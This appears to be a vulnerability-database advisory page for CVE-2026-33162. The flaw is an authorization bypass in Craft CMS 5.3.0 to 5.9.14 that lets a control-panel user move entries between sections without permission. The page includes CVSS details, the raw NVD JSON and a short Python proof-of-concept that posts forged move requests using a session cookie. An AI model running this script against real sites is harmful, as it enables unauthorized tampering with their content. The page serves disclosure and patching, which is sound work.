Security Vulnerability Report
中文
CVE-2026-33162 CVSS 6.5 MEDIUM

CVE-2026-33162

Published: 2026-03-24 18:16:10
Last Modified: 2026-03-26 20:41:41
Source: [email protected]

Description

Craft CMS is a content management system (CMS). From version 5.3.0 to before version 5.9.14, an authenticated control panel user with only accessCp can move entries across sections via POST /actions/entries/move-to-section, even when they do not have saveEntries:{sectionUid} permission for either source or destination section. This issue has been patched in version 5.9.14.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* - VULNERABLE
Craft CMS >= 5.3.0, < 5.9.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the vulnerable Craft CMS instance target_url = "https://target-craft-site.com/actions/entries/move-to-section" # Valid session cookie for a user with 'accessCp' permission # but without 'saveEntries' permission for the target section cookies = { "PHPSESSID": "valid_session_cookie_here", "CraftSessionId": "session_id_here" } # Exploit payload: Move an entry to an unauthorized section payload = { "entryId": "123", # ID of the entry to move "sectionId": "456", # ID of the target section (unauthorized) "siteId": "1" # Site ID } try: response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Entry moved without proper permissions.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33162", "sourceIdentifier": "[email protected]", "published": "2026-03-24T18:16:10.420", "lastModified": "2026-03-26T20:41:41.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Craft CMS is a content management system (CMS). From version 5.3.0 to before version 5.9.14, an authenticated control panel user with only accessCp can move entries across sections via POST /actions/entries/move-to-section, even when they do not have saveEntries:{sectionUid} permission for either source or destination section. This issue has been patched in version 5.9.14."}, {"lang": "es", "value": "Craft CMS es un sistema de gestión de contenido (CMS). Desde la versión 5.3.0 hasta antes de la versión 5.9.14, un usuario autenticado del panel de control con solo accessCp puede mover entradas entre secciones a través de POST /actions/entries/move-to-section, incluso cuando no tienen el permiso saveEntries:{sectionUid} para la sección de origen o de destino. Este problema ha sido parcheado en la versión 5.9.14."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3.0", "versionEndExcluding": "5.9.14", "matchCriteriaId": "ECC30E7E-C919-4CE7-9A4D-CB5B149922F6"}]}]}], "references": [{"url": "https://github.com/craftcms/cms/commit/3c1ab1c4445dd9237855a66e6a06ecf3591a718e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/craftcms/cms/releases/tag/5.9.14", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/craftcms/cms/security/advisories/GHSA-f582-6gf6-gx4g", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.